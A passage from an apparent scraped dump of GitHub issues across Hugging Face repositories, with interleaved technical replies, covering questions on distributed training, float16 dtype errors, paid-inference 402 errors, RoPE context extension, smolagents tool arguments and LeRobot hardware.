    "url": "https://github.com/huggingface/agents-course/issues/290",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-05T23:49:06Z",
    "updated_at": "2025-03-18T14:45:44Z",
    "user": "Sabk0926"
  },
  {
    "repo": "huggingface/accelerate",
    "number": 3421,
    "title": "How to sync distribute model paramaters when training with continual learning fashion?",
    "body": "When performing distributed continual learning tasks, it is common to expand model parameters as tasks increase. For example, I have defined an `expand_classifier()`  method with random initialization to increase the parameters of the classifier. \n\nHow can I ensure that the newly added parameters are initialized the same on each GPU model?\n\nIf i do\n```\nif self.accelerator.is_main_process:\n    self.model.module.prompt.expand_classifier()\n\n```\nHow can i sync classifier across all distributed model?",
    "url": "https://github.com/huggingface/accelerate/issues/3421",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-05T13:44:15Z",
    "updated_at": "2025-04-13T15:06:22Z",
    "user": "Iranb"
  },
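One way to guarantee identical initialization (a generic `torch.distributed` pattern rather than an accelerate-specific API; the `classifier` attribute below is hypothetical): run the expansion on every rank so the module structure matches, then broadcast rank 0's freshly initialized weights to everyone.

```python
import torch.distributed as dist

def sync_params_from_rank0(module) -> None:
    """Overwrite every rank's parameters with rank 0's values."""
    for param in module.parameters():
        dist.broadcast(param.data, src=0)

# every rank must call expand_classifier() so the module graphs match; the
# random init on ranks != 0 is then overwritten by rank 0's weights:
#   self.model.module.prompt.expand_classifier()
#   sync_params_from_rank0(self.model.module.prompt.classifier)  # hypothetical attr
```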
  {
    "repo": "huggingface/lerobot",
    "number": 817,
    "title": "SO 100 Arm assembly instruction inconsistency",
    "body": "Step 22 of the assembly guide shows a picture of wrist that is flipped comparing to the drawing and front page photo. Are both right? If not, which one is correct?\n\n[Latest instruction](https://github.com/huggingface/lerobot/blob/main/examples/10_use_so100.md#wrist-assembly):\n\"Image\"\n\n[Assembly video](https://github.com/huggingface/lerobot/blob/main/examples/10_use_so100.md#additional-guidance):\n\"Image\"\n\n[Project home page](https://github.com/huggingface/lerobot/tree/main?tab=readme-ov-file#------------build-your-own-so-100-robot):\n![Image](https://github.com/user-attachments/assets/f23cf441-93f9-4bd5-aeba-45d2d81aa80d)",
    "url": "https://github.com/huggingface/lerobot/issues/817",
    "state": "closed",
    "labels": [
      "question",
      "robots",
      "stale"
    ],
    "created_at": "2025-03-05T05:23:57Z",
    "updated_at": "2025-11-30T02:37:07Z",
    "user": "liuhuanjim013"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 472,
    "title": "how to set  the max_model_length, max_new_tokens and generation_size when evaluate ?",
    "body": "Suppose the max_position_embedding of my model is 4096, how to set max_model_length, max_new_tokens and generation_size  to. get the correct evaluate result?  For example , set max_model_length=4096, max_new_tokens=1000, generation_size=1000?",
    "url": "https://github.com/huggingface/open-r1/issues/472",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-05T04:01:48Z",
    "updated_at": "2025-03-12T03:41:42Z",
    "user": "ItGirls"
  },
  {
    "repo": "huggingface/transformers",
    "number": 36546,
    "title": "how to use transformers with musicgen with float16",
    "body": "```\nimport transformers, torch, builtins, numpy\n\nprocessor = transformers.AutoProcessor.from_pretrained(' facebook/musicgen-stereo-melody-large', torch_dtype=torch.float16)\nmodel = transformers.MusicgenMelodyForConditionalGeneration.from_pretrained('facebook/musicgen-stereo-melody-large ,torch_dtype=torch.float16).to('cuda')\n\nresult = []\nfor _ in builtins.range(2):\n    inputs = processor(audio=result[-1] if result else None, sampling_rate=model.config.audio_encoder.sampling_rate, text='A grand and majestic symphony with soaring strings, powerful brass, and dynamic orchestration. Inspired by Beethoven and Tchaikovsky, featuring dramatic crescendos, delicate woodwind passages, and a triumphant finale. The mood is epic, emotional, and timeless', padding=True, return_tensors='pt').to('cuda')\n    audio_values = model.generate(**inputs, max_new_tokens=1000)\n    result += audio_values[0, 0].cpu().numpy(),\n\nfrom IPython.display import Audio\nAudio(numpy.concatenate(result), rate=model.config.audio_encoder.sampling_rate)\n```\ni alwayse get\n```\n in ()\n      7 for _ in builtins.range(2):\n      8     inputs = processor(audio=torch.from_numpy(result[-1]).to(dtype=torch.float32) if result else None, sampling_rate=model.config.audio_encoder.sampling_rate, text='A grand and majestic symphony with soaring strings, powerful brass, and dynamic orchestration. Inspired by Beethoven and Tchaikovsky, featuring dramatic crescendos, delicate woodwind passages, and a triumphant finale. The mood is epic, emotional, and timeless', padding=True, return_tensors='pt').to('cuda')\n----> 9     audio_values = model.generate(**inputs, max_new_tokens=1000)\n     10     result += audio_values[0, 0].cpu().numpy(),\n     11 \n\n5 frames\n/usr/local/lib/python3.11/dist-packages/torch/nn/modules/linear.py in forward(self, input)\n    123 \n    124     def forward(self, input: Tensor) -> Tensor:\n--> 125         return F.linear(input, self.weight, self.bias)\n    126 \n    127     def extra_repr(self) -> str:\n\nRuntimeError: mat1 and mat2 must have the same dtype, but got Float and Half\n```\n",
    "url": "https://github.com/huggingface/transformers/issues/36546",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-05T00:40:24Z",
    "updated_at": "2025-03-06T09:49:18Z",
    "user": "ghost"
  },
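The traceback says the processor's float32 features are hitting fp16 weights inside `F.linear`. A minimal workaround sketch (generic PyTorch, untested against this exact model): cast only the floating-point inputs to the model's dtype before calling `generate`.

```python
import torch

def to_model_dtype(inputs, dtype: torch.dtype):
    """Cast only floating-point tensors; token ids must stay integer."""
    return {
        k: v.to(dtype) if torch.is_tensor(v) and v.is_floating_point() else v
        for k, v in inputs.items()
    }

# usage, continuing the snippet above:
# inputs = processor(..., return_tensors='pt').to('cuda')
# audio_values = model.generate(**to_model_dtype(inputs, model.dtype), max_new_tokens=1000)
```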
  {
    "repo": "huggingface/lerobot",
    "number": 813,
    "title": "State Collection Timing Issue in Manipulator Teleoperation: Post-action vs Pre-action States",
    "body": "**Description:**\nI've noticed in lerobot/lerobot/common/robot_devices/robots/manipulator.py that during teleoperation, the state being collected is the state after action execution. Is this intended behavior?\nIn my understanding, model inference should use the state before action execution, not after. This could potentially impact learning and inference accuracy, as the model would be using post-action states to predict actions rather than pre-action states.\n\n![Image](https://github.com/user-attachments/assets/89a88379-9369-4eda-8885-8a250ca950dc)\n\n![Image](https://github.com/user-attachments/assets/1ad0705a-e225-4858-94d0-1b774bb4a974)\n",
    "url": "https://github.com/huggingface/lerobot/issues/813",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-03-04T14:19:52Z",
    "updated_at": "2025-10-07T02:26:55Z",
    "user": "www-Ye"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 284,
    "title": "[QUESTION] Clarify Payment Required for completing Unit 2 notebooks",
    "body": "For the notebook for [components.ipynb]() I ran the `IngestionPipeline` function as follows:\n\n```py\nfrom llama_index.embeddings.huggingface_api import HuggingFaceInferenceAPIEmbedding\nfrom llama_index.core.node_parser import SentenceSplitter\nfrom llama_index.core.ingestion import IngestionPipeline\n\n# create the pipeline with transformations\npipeline = IngestionPipeline(\n    transformations=[\n        SentenceSplitter(),\n        HuggingFaceInferenceAPIEmbedding(model_name=\"BAAI/bge-small-en-v1.5\"),\n    ]\n)\n\n# run the pipeline sync or async\nnodes = await pipeline.arun(documents=documents[:10])\nnodes\n```\n\nI got the following outcome and looks like this .ipynb can't be executed without a payment route:\n\n```python\n---------------------------------------------------------------------------\n\nClientResponseError                       Traceback (most recent call last)\n\n[](https://localhost:8080/#) in ()\n     12 \n     13 # run the pipeline sync or async\n---> 14 nodes = await pipeline.arun(documents=documents[:10])\n     15 nodes\n\n12 frames\n\n[/usr/local/lib/python3.11/dist-packages/aiohttp/client_reqrep.py](https://localhost:8080/#) in raise_for_status(self)\n   1159                 self.release()\n   1160 \n-> 1161             raise ClientResponseError(\n   1162                 self.request_info,\n   1163                 self.history,\n\nClientResponseError: 402, message='Payment Required', url='https://api-inference.huggingface.co/pipeline/feature-extraction/BAAI/bge-small-en-v1.5'\n```\n\nis there any free and open alternatives?\n",
    "url": "https://github.com/huggingface/agents-course/issues/284",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-04T14:16:01Z",
    "updated_at": "2025-03-06T16:08:39Z",
    "user": "carlosug"
  },
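One free route (an alternative setup rather than a fix for the hosted endpoint): compute the embeddings locally instead of through the Inference API, e.g. with llama-index's local HuggingFace embedding class.

```python
# pip install llama-index-embeddings-huggingface sentence-transformers
from llama_index.embeddings.huggingface import HuggingFaceEmbedding
from llama_index.core.node_parser import SentenceSplitter
from llama_index.core.ingestion import IngestionPipeline

pipeline = IngestionPipeline(
    transformations=[
        SentenceSplitter(),
        # runs on your own CPU/GPU, so no 402 Payment Required
        HuggingFaceEmbedding(model_name="BAAI/bge-small-en-v1.5"),
    ]
)
# nodes = await pipeline.arun(documents=documents[:10])
```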
  {
    "repo": "huggingface/agents-course",
    "number": 281,
    "title": "[any free and unpaid alternative for Inference Providers?]",
    "body": "while executing the [notebook](https://colab.research.google.com/github/huggingface/agents-course/blob/main/notebooks/unit2/smolagents/multiagent_notebook.ipynb) on **unit2. multi agent systems**, i got the following client error for [Inference Providers](https://huggingface.co/blog/inference-providers):\n\n```python\n\n> result = agent.run(task)\n\nHTTPError: 402 Client Error: Payment Required for url: https://huggingface.co/api/inference-proxy/together/v1/chat/completions\n\n\nThe above exception was the direct cause of the following exception:\n\nHfHubHTTPError                            Traceback (most recent call last)\n\n[/usr/local/lib/python3.11/dist-packages/huggingface_hub/utils/_http.py](https://localhost:8080/#) in hf_raise_for_status(response, endpoint_name)\n    475         # Convert `HTTPError` into a `HfHubHTTPError` to display request information\n    476         # as well (request id and/or server error message)\n--> 477         raise _format(HfHubHTTPError, str(e), response) from e\n    478 \n    479 \n\nHfHubHTTPError: 402 Client Error: Payment Required for url: https://huggingface.co/api/inference-proxy/together/v1/chat/completions (Request ID: Root=1-67c6f46c-005ae18a6bffc88c0d7a6668;04e6891c-45f6-4358-81fc-b5b794f25ddd)\n\nYou have exceeded your monthly included credits for Inference Providers. Subscribe to PRO to get 20x more monthly allowance.\n```\n\nany free and unpaid alternative for Inference Providers?",
    "url": "https://github.com/huggingface/agents-course/issues/281",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-04T12:51:26Z",
    "updated_at": "2025-03-31T07:23:49Z",
    "user": "carlosug"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 808,
    "title": "How to acquire the End-Effector\uff08eef\uff09 pose?",
    "body": "Hi, thanks for your great job!\n\n    How can we acquire the eef pose and control the eef pose instead of only the joints states?\n\nThanks for your attention and hope for your kind response!",
    "url": "https://github.com/huggingface/lerobot/issues/808",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "robots",
      "stale"
    ],
    "created_at": "2025-03-04T09:30:35Z",
    "updated_at": "2025-10-16T02:28:50Z",
    "user": "oym1994"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 806,
    "title": "How to control local robot with remote model?",
    "body": "I have achieved the inference process on my local computer. I want to know how to put the model on a remote server and control a robot on local.\n\nMy robot: Koch1.1",
    "url": "https://github.com/huggingface/lerobot/issues/806",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-03-04T09:09:12Z",
    "updated_at": "2025-10-16T02:28:51Z",
    "user": "neverspillover"
  },
  {
    "repo": "huggingface/optimum-intel",
    "number": 1186,
    "title": "How to initialize development env for this repo?",
    "body": "Hi! I would like to develop this repo, met some issues during env initialization. I ran `pip install -e .` to install current repo to local python env.\nHowever error came out when running 'pytest tests\\'\n`ImportError while importing test module '/home/shji/codes/optimum-intel/tests/ipex/test_modeling.py'.\nHint: make sure your test modules/packages have valid Python names.\nTraceback:\n../../miniforge3/envs/optimum-intel/lib/python3.11/importlib/__init__.py:126: in import_module\n    return _bootstrap._gcd_import(name[level:], package, level)\ntests/ipex/test_modeling.py:42: in \n    from optimum.intel import (\nE   ImportError: cannot import name 'IPEXModelForSeq2SeqLM' from 'optimum.intel' (/home/shji/codes/optimum-intel/optimum/intel/__init__.py`\n\nSeems like installation is wrong or something has been missed as local module cannot be found.\n\nCould you provide me some suggestions?  Any documentation for setting dev env would be better, thank you ",
    "url": "https://github.com/huggingface/optimum-intel/issues/1186",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-04T06:10:15Z",
    "updated_at": "2025-03-10T06:01:21Z",
    "user": "shjiyang-intel"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 457,
    "title": "How to run reject sampling",
    "body": "I ran generate_reaoning and got the cot data. How do I run reject sampling after that?",
    "url": "https://github.com/huggingface/open-r1/issues/457",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-03T03:56:32Z",
    "updated_at": "2025-03-03T03:56:32Z",
    "user": "JavaZeroo"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 797,
    "title": "use_delta_joint_actions_aloha",
    "body": "        if self.use_delta_joint_actions_aloha:\n            raise NotImplementedError(\n                \"`use_delta_joint_actions_aloha` is used by pi0 for aloha real models. It is not ported yet in LeRobot.\"\n            )\n\nwhen will you put implementation for it because it is very important\n",
    "url": "https://github.com/huggingface/lerobot/issues/797",
    "state": "closed",
    "labels": [
      "question",
      "policies"
    ],
    "created_at": "2025-03-02T18:14:13Z",
    "updated_at": "2025-04-03T16:39:39Z",
    "user": "AbdElrahmanMostafaRifaat1432"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 453,
    "title": "How to log the intermediate outputs results\uff1f",
    "body": "How to log the intermediate outputs results to track the 'aha moment'. How can I set this in config or modify the code?",
    "url": "https://github.com/huggingface/open-r1/issues/453",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-01T17:08:48Z",
    "updated_at": "2025-03-09T13:53:59Z",
    "user": "0205090923"
  },
  {
    "repo": "huggingface/Math-Verify",
    "number": 32,
    "title": "How to adjust the priority of '\\\\ln' and '*' when parsing latex?",
    "body": "When I try to parse a string: \"$$ \\\\dfrac{\\\\cos x}{2\\\\lnx * x^{\\\\ln x - 1}} $$\", the result is \"cos(x)/((2*log(x*x**(log(x, E) - 1), E)))\", rather than \"cos(x)/((2*x**(log(x, E) - 1)*log(x, E)))\". It seems that there is something wrong when dealing with the priority of '\\\\ln' and '*'. So I wonder how to adjust the priority to fix this error. Thank you!\n\nError case:\n\n![Image](https://github.com/user-attachments/assets/e6255a11-6365-4f9c-af2a-a2cd49092ea1)\n\nExpected (which changes the order of '\\\\ln'):\n\n![Image](https://github.com/user-attachments/assets/13459cf1-e245-420b-bff6-25d027bbce2f)",
    "url": "https://github.com/huggingface/Math-Verify/issues/32",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-01T09:22:31Z",
    "updated_at": "2025-07-01T20:17:49Z",
    "user": "yhhu99"
  },
  {
    "repo": "huggingface/smolagents",
    "number": 842,
    "title": "How to pass custom type variables to tools",
    "body": "\nI\u2019m working on a Telegram bot and using the `smolagents` library to create agents that handle reminders. The issue I\u2019m facing is related to passing the `context` object (which is specific to each message received by the bot) to a tool function (`add_reminder`). The `context` object is required to access the `job_queue` for scheduling reminders.\n\n### Problem:\nEven though I\u2019m passing the `context` variable through the `additional_args` argument in `agent.run`, the agent doesn\u2019t seem to pass this variable directly to the code interpreter. Instead, it redefines the variable as `None`, which causes the rest of the code to fail.\n\nHere\u2019s the relevant part of the code:\n\n```python\n@tool\ndef add_reminder(title: str,\n                    date_time: datetime.datetime,\n                    chat_id: str,\n                    context: Any,\n                    location: str = None,\n                    details: str = None) -> dict:\n    \n    '''\n    Add a reminder to the job queue.\n    \n    Args:\n    title: The title of the reminder  (str)\n    date_time: The time for the reminder\n    location: The location of the reminder if it is specified. If not then None (str)\n    details: The details of the reminder if it is specified. If not then None (str)\n    chat_id: pass the chat_id given to you\n    context: pass the context given to you\n    '''\n    \n    # try:\n    reminder = {}\n    reminder['Title'] = title\n    reminder['Time'] = date_time\n    reminder['Location'] = location\n    reminder['Details'] = details\n\n    # Convert the reminder time string to a localized datetime object\n    timer_date = date_time.replace(tzinfo=None)\n    timer_date = tz.localize(timer_date)\n    timer_date_string = timer_date.strftime(\"%H:%M %d/%m/%Y\")\n\n    timer_name = f\"{title} ({timer_date_string})\"\n    reminder['run'] = 'once'\n    reminder['text'] = reminder_to_text(reminder)\n\n    # Calculate the time remaining in seconds\n    now = datetime.datetime.now(tz)\n    seconds_until_due = (timer_date - now).total_seconds()\n\n    # Check if the time is in the past\n    if seconds_until_due <= 0:\n        return {'success': False, 'message': TXT_NOT_ABLE_TO_SCHEDULE_PAST}\n\n    reminder['type'] = 'parent'\n    \n    context.job_queue.run_once(\n        alarm,\n        when=timer_date,\n        chat_id=chat_id,\n        name=timer_name,\n        data=reminder,\n    )\n    \n    reminder['type'] = '-30'\n    context.job_queue.run_once(\n        alarm_minus_30,\n        when=timer_date - datetime.timedelta(minutes=30),\n        chat_id=chat_id,\n        name=timer_name,\n        data=reminder,\n    )\n        \n    return {'success': True, 'message': TXT_REMINDER_SCHEDULED, 'response_for_user': reminder['text']}\n\n\nasync def add_reminder_from_input(update, context):\n    # Add the reminder\n    input = update.message.text\n    chat_id = update.effective_chat.id\n    now = datetime.datetime.now(tz).strftime(\"%d/%m/%Y %H:%M\")\n    \n    logger.info(f'chat_id: {chat_id}, input: {input}')\n    \n\n    agent = CodeAgent(tools=[add_reminder],\n                     additional_authorized_imports=['datetime'],\n                     model=OpenAIServerModel(model_id='gpt-4o-mini', api_key = OPENAI_TOKEN),\n                     verbosity_level=3,\n                     max_steps = 2)\n                                               \n\n    answer = agent.run(TXT_MENU_AGENT_SYSTEM_PROMPT.format(input=input, now=now),\n                        additional_args={\"context\": 
context, \"chat_id\":chat_id})\n    \n    await send_message(update, context, text=answer)\n\n```\n\nWhen the agent runs, it generates code like this:\n\n```python\n \u2500 Executing parsed code: \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n  from datetime import datetime, timedelta                                                                                                 \n                                                                                                                                           \n  # Set the reminder details                                                                                                               \n  title = \"Meeting with John\"                                                                                                      \n  date_time = datetime(2025, 3, 1, 9, 0)  # March 1, 2025, at 09:00                                                                        \n  chat_id = 6129357493                                                                                                                     \n  context = None  # This would typically be the provided context object                                                                    \n                                                                                                                                           \n  # Add the reminder                                                                                                                       \n  reminder_response = add_reminder(tit",
    "url": "https://github.com/huggingface/smolagents/issues/842",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-28T23:04:49Z",
    "updated_at": "2025-03-01T23:45:40Z",
    "user": "ebravofm"
  },
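One workaround pattern (not an official smolagents recommendation): the model can only write JSON-like literals into generated code, so live objects such as `context` should not appear in the tool signature at all; capture them with a closure when the tool is built. A sketch, where `alarm` is the callback from the original handler:

```python
import datetime
from smolagents import tool

def make_add_reminder(context, chat_id):
    @tool
    def add_reminder(title: str, date_time: str) -> str:
        """Schedule a reminder.

        Args:
            title: The title of the reminder.
            date_time: ISO timestamp, e.g. "2025-03-01T09:00".
        """
        when = datetime.datetime.fromisoformat(date_time)
        # `context` and `chat_id` come from the enclosing scope, not the LLM
        context.job_queue.run_once(alarm, when=when, chat_id=chat_id, name=title)
        return "scheduled"

    return add_reminder

# per request: agent = CodeAgent(tools=[make_add_reminder(context, chat_id)], model=...)
```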
  {
    "repo": "huggingface/sentence-transformers",
    "number": 3254,
    "title": "How to train sentencetransformer with multiple negative\uff1f",
    "body": "I have a dataset like:  {'anchor':str,'postive':str,negative:list[str]}\nit seems invalid by example code \n\n```python\n    model = SentenceTransformer(model_path)\n\n    extend_position_embeddings(model._first_module().auto_model,max_length)\n\n    loss = CachedMultipleNegativesRankingLoss(model, mini_batch_size=16)\n\n\n    training_args = SentenceTransformerTrainingArguments(\n        output_dir=f\"./model_dir/{args.save_name}-{args.data_mode}\",\n        overwrite_output_dir=True,\n        logging_dir=\"./logs\",\n        logging_steps=1,\n        save_strategy='epoch',\n        save_total_limit=2,\n        # max_steps=900,\n        num_train_epochs=3,\n        warmup_ratio=0.05,\n        learning_rate=3e-5,\n        weight_decay=0.01,\n        gradient_accumulation_steps=16,\n        per_device_train_batch_size=4,\n        dataloader_num_workers=1,\n        batch_sampler=BatchSamplers.NO_DUPLICATES,\n        fp16=True,\n        lr_scheduler_type=\"cosine\",\n        remove_unused_columns=False,\n        # deepspeed='/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/ruanjunhao/chatrag-bench/train/ds3.json',\n        # gradient_checkpointing=True,\n    )\n\n\n\n    trainer = SentenceTransformerTrainer(\n        model=model,\n        args=training_args,\n        train_dataset=dataset,\n        loss=loss,\n    )\n    dataloader = trainer.get_train_dataloader()\n\n    for d in dataloader:\n        import pdb\n        pdb.set_trace()\n    trainer.train()\n\n\n\n```\n\n\n```bash\n\n  File \"/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/env/rjh/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 1191, in __init__\n    self._reset(loader, first_iter=True)\n  File \"/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/env/rjh/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 1228, in _reset\n    self._try_put_index()\n  File \"/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/env/rjh/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 1471, in _try_put_index\n    index = self._next_index()\n            ^^^^^^^^^^^^^^^^^^\n  File \"/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/env/rjh/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 691, in _next_index\n    return next(self._sampler_iter)  # may raise StopIteration\n           ^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/env/rjh/lib/python3.12/site-packages/sentence_transformers/sampler.py\", line 193, in __iter__\n    value\nTypeError: unhashable type: 'list'\n```",
    "url": "https://github.com/huggingface/sentence-transformers/issues/3254",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-28T15:01:19Z",
    "updated_at": "2025-06-13T05:04:35Z",
    "user": "rangehow"
  },
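The failure comes from the NO_DUPLICATES batch sampler hashing column values, and a list is not hashable. The loss itself does accept several negatives when they arrive as separate string columns (the "(anchor, positive, negative_1, ..., negative_n)" format), so one workaround, assuming every row carries the same number of negatives, is to explode the list:

```python
from datasets import Dataset

def explode_negatives(example: dict) -> dict:
    row = {"anchor": example["anchor"], "positive": example["positive"]}
    # one string column per negative: negative_1, negative_2, ...
    for i, neg in enumerate(example["negative"], start=1):
        row[f"negative_{i}"] = neg
    return row

dataset = Dataset.from_list([
    {"anchor": "a", "positive": "p", "negative": ["n1", "n2"]},
])
dataset = dataset.map(explode_negatives, remove_columns=["negative"])
print(dataset.column_names)  # ['anchor', 'positive', 'negative_1', 'negative_2']
```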
  {
    "repo": "huggingface/lerobot",
    "number": 789,
    "title": "how to run eval  with mujoco sim?",
    "body": "now ,run eval.py is only output in command line. how to run eval  with mujoco sim?",
    "url": "https://github.com/huggingface/lerobot/issues/789",
    "state": "closed",
    "labels": [
      "simulation",
      "stale"
    ],
    "created_at": "2025-02-28T10:42:46Z",
    "updated_at": "2025-10-08T11:57:42Z",
    "user": "mmlingyu"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 788,
    "title": "offline run convert_dataset_v1_to_v2.py",
    "body": "I need help!!!!!\nfor example\uff0cwhen i run convert_dataset_v1_to_v2.py, it prompts the following:\n\n![Image](https://github.com/user-attachments/assets/a4a87562-f0bd-444f-9e32-11cae281ae6f)\n\nand what is train.parquet?\n![Image](https://github.com/user-attachments/assets/8e24bb90-ef6c-4e55-9b1e-17acd7050312)\n\nhow to solve it?",
    "url": "https://github.com/huggingface/lerobot/issues/788",
    "state": "closed",
    "labels": [
      "bug",
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-02-28T06:41:43Z",
    "updated_at": "2025-10-09T21:54:09Z",
    "user": "ximiluuuu"
  },
  {
    "repo": "huggingface/sentence-transformers",
    "number": 3252,
    "title": "How to train sentence transformers with multi machines?",
    "body": "The [docs](https://sbert.net/docs/sentence_transformer/training/distributed.html) describes how to train sentence transformers with multi-GPUs.\n\nBut both my model and my data are huge, and training sentence transformers with 8 GPUs in one single machine is still very slow.\n\nDoes sentence transformers support training using mutiple machines, each with 8 GPUs. Do we have any examples?\n\nThank you very much.",
    "url": "https://github.com/huggingface/sentence-transformers/issues/3252",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-27T13:37:02Z",
    "updated_at": "2025-02-27T13:37:02Z",
    "user": "awmoe"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10917,
    "title": "Is lumina-2.0 script correct?",
    "body": "I wrote a script, based on the one provided [here](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_lumina2.py)\n\nit gets stuck on loss around 0.5, and i think it is a lot, isn't it?",
    "url": "https://github.com/huggingface/diffusers/issues/10917",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-27T11:17:00Z",
    "updated_at": "2025-02-28T15:46:43Z",
    "comments": 3,
    "user": "Riko0"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 444,
    "title": "How to increase the context window from 4k to 32k on qwen models ?",
    "body": "Hello,\n\nI'm trying to distill a subset of the [OpenR1-Math-220k](https://huggingface.co/datasets/open-r1/openr1-220k-math) dataset into my Qwen/Qwen2.5-Math-7B-Instruct. I want to do this via a custom SFT pipeline in order to see if I can match the results obtained in the evaluations.\n\nHowever I'm struggling increasing the context window of the Qwen math model from 4k to 32k tokens. \n\nThis is what I tried in the config.json of the model: \n\n``` \n{\n  \"_name_or_path\": \"Qwen/Qwen2.5-Math-7B-Instruct\",\n  \"architectures\": [\n    \"Qwen2ForCausalLM\"\n  ],\n  \"attention_dropout\": 0.0,\n  \"bos_token_id\": 151643,\n  \"eos_token_id\": 151645,\n  \"hidden_act\": \"silu\",\n  \"hidden_size\": 3584,\n  \"initializer_range\": 0.02,\n  \"intermediate_size\": 18944,\n  \"max_position_embeddings\": 32768,\n  \"max_window_layers\": 28,\n  \"model_type\": \"qwen2\",\n  \"num_attention_heads\": 28,\n  \"num_hidden_layers\": 28,\n  \"num_key_value_heads\": 4,\n  \"rms_norm_eps\": 1e-06,\n    \"rope_scaling\": {\n    \"type\": \"linear\",\n    \"factor\": 8.0\n  },\n  \"rope_theta\": 10000.0,\n  \"sliding_window\": null,\n  \"tie_word_embeddings\": false,\n  \"torch_dtype\": \"bfloat16\",\n  \"transformers_version\": \"4.48.1\",\n  \"use_cache\": true,\n  \"use_sliding_window\": false,\n  \"vocab_size\": 152064\n}\n```\n\nBut the generations obtained with this base model are garbage. Do you have any advices on which parameters are the best and how to be able to train the model on bigger context windows than initially released ? \n\nThanks !\n",
    "url": "https://github.com/huggingface/open-r1/issues/444",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-27T10:27:43Z",
    "updated_at": "2025-07-24T23:56:12Z",
    "user": "Jeremmmyyyyy"
  },
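For what it's worth, static linear RoPE scaling applied without any long-context fine-tuning commonly degrades output badly, and the Qwen2.5 model cards document YaRN-style scaling instead. A hedged sketch of overriding the config in code rather than editing config.json (the exact `rope_scaling` fields here are an assumption; check the model card and transformers version):

```python
from transformers import AutoConfig, AutoModelForCausalLM

cfg = AutoConfig.from_pretrained("Qwen/Qwen2.5-Math-7B-Instruct")
cfg.max_position_embeddings = 32768
# YaRN-style extension from the native 4k window; 8.0 * 4096 = 32768
cfg.rope_scaling = {
    "type": "yarn",
    "factor": 8.0,
    "original_max_position_embeddings": 4096,
}
model = AutoModelForCausalLM.from_pretrained(
    "Qwen/Qwen2.5-Math-7B-Instruct", config=cfg, torch_dtype="bfloat16"
)
```

Even with YaRN, quality at long lengths without fine-tuning is not guaranteed; SFT on long sequences is usually still needed.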
  {
    "repo": "huggingface/trl",
    "number": 2972,
    "title": "How many H20 (96GB) GPUs are needed to train Qwen7B with the GRPO algorithm?",
    "body": "I want to use the GRPO algorithm to train Qwen7B, but I failed using 4 H20 (96GB) GPUs with the trl library. I would like to know how many H20 GPUs are needed.",
    "url": "https://github.com/huggingface/trl/issues/2972",
    "state": "open",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-02-27T04:12:16Z",
    "updated_at": "2025-03-14T02:22:36Z",
    "user": "Tuziking"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 779,
    "title": "Is there a way for a robot arm with kinesthetic teaching function to collect data using lerobot?",
    "body": "Hello, I have a robot arm with kinesthetic teaching function. I guess I can teach my robot at the first time, and collect data from the second time using lerobot? I'm here to ask is this easy to achieve by modifying control_robot.py file? Thanks",
    "url": "https://github.com/huggingface/lerobot/issues/779",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-02-26T17:50:51Z",
    "updated_at": "2025-10-16T02:28:54Z",
    "user": "yzzueong"
